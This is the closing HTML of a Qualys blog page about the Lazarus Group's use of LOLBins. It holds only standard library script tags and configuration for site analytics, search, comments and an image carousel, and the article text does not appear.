src="https://cdnjs.cloudflare.com/ajax/libs/jquery-migrate/3.3.2/jquery-migrate.min.js" id="jquery-migrate-js" integrity='sha512-3fMsI1vtU2e/tVxZORSEeuMhXnT9By80xlmXlsOku7hNwZSHJjwcOBpmy+uu+fyWwGCLkMvdVbHkeoXdAzBv+w==' crossorigin='anonymous' referrerpolicy='no-referrer'></script> <script src="https://ik.imagekit.io/qualys/wp-includes/js/underscore.min.js?ver=1.13.4" id="underscore-js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.6.0/highlight.min.js" id="qualys2020-highlightjs-js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/waypoints/4.0.1/noframework.waypoints.min.js" id="waypoint-js"></script> <script id="qualys2020-script-js-extra"> var qualys2020Script = {"ajaxurl":"https:\/\/blog.qualys.com\/wp-admin\/admin-ajax.php","current_page":"0","max_page":"0","archive_type":"all","content_id":"29363"}; </script> <script src="https://ik.imagekit.io/qualys/wp-content/themes/qualys2020/script/script.js?ver=1.0.3" id="qualys2020-script-js"></script> <script src="https://www.google.com/recaptcha/api.js" id="recaptcha-js"></script> <script src="https://ik.imagekit.io/qualys/wp-includes/js/comment-reply.min.js?ver=6.6.2" id="comment-reply-js" async data-wp-strategy="async"></script> <script src="https://static.cloud.coveo.com/searchui/v2.10085/2/js/CoveoJsSearch.Lazy.min.js" id="coveo-script-js" integrity='sha512-vueueBf3ND6Jj5E31AIFE28WnA2gQaGt3jHb+Wx5c0bDFBiKgQ8in3T9L4nVHC02v1uEgsrD4vL6pgYUGwZ3Kw==' crossorigin='anonymous'></script> <script src="https://ik.imagekit.io/qualys/wp-content/themes/qualys2020/script/coveo.js" id="q-script-coveo-js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.5.7/jquery.fancybox.min.js" id="fancybox-script-js"></script> <script src="https://stats.wp.com/e-202447.js" id="jetpack-stats-js" data-wp-strategy="defer"></script> <script id="jetpack-stats-js-after"> _stq = window._stq || []; _stq.push([ "view", JSON.parse("{\"v\":\"ext\",\"blog\":\"105655880\",\"post\":\"29363\",\"tz\":\"-8\",\"srv\":\"blog.qualys.com\",\"j\":\"1:13.9.1\"}") ]); _stq.push([ "clickTrackerInit", "105655880", "29363" ]); </script> <script id="jetpack-carousel-js-extra"> var jetpackSwiperLibraryPath = {"url":"https:\/\/blog.qualys.com\/wp-content\/plugins\/jetpack\/_inc\/build\/carousel\/swiper-bundle.min.js"}; var jetpackCarouselStrings = {"widths":[370,700,1000,1200,1400,2000],"is_logged_in":"","lang":"en","ajaxurl":"https:\/\/blog.qualys.com\/wp-admin\/admin-ajax.php","nonce":"1d8f01989f","display_exif":"0","display_comments":"1","single_image_gallery":"1","single_image_gallery_media_file":"","background_color":"black","comment":"Comment","post_comment":"Post Comment","write_comment":"Write a Comment...","loading_comments":"Loading Comments...","download_original":"View full size <span class=\"photo-size\">{0}<span class=\"photo-size-times\">\u00d7<\/span>{1}<\/span>","no_comment_text":"Please be sure to submit some text with your comment.","no_comment_email":"Please provide an email address to comment.","no_comment_author":"Please provide your name to comment.","comment_post_error":"Sorry, but there was an error posting your comment. Please try again later.","comment_approved":"Your comment was approved.","comment_unapproved":"Your comment is in moderation.","camera":"Camera","aperture":"Aperture","shutter_speed":"Shutter Speed","focal_length":"Focal Length","copyright":"Copyright","comment_registration":"0","require_name_email":"1","login_url":"https:\/\/blog.qualys.com\/wp-login.php?redirect_to=https%3A%2F%2Fblog.qualys.com%2Fvulnerabilities-threat-research%2F2022%2F02%2F08%2Flolzarus-lazarus-group-incorporating-lolbins-into-campaigns","blog_id":"1","meta_data":["camera","aperture","shutter_speed","focal_length","copyright"]}; </script> <script src="https://ik.imagekit.io/qualys/wp-content/plugins/jetpack/_inc/build/carousel/jetpack-carousel.min.js?ver=13.9.1" id="jetpack-carousel-js"></script> <script defer src="https://ik.imagekit.io/qualys/wp-content/plugins/akismet/_inc/akismet-frontend.js?ver=1720667369" id="akismet-frontend-js"></script> </body> </html>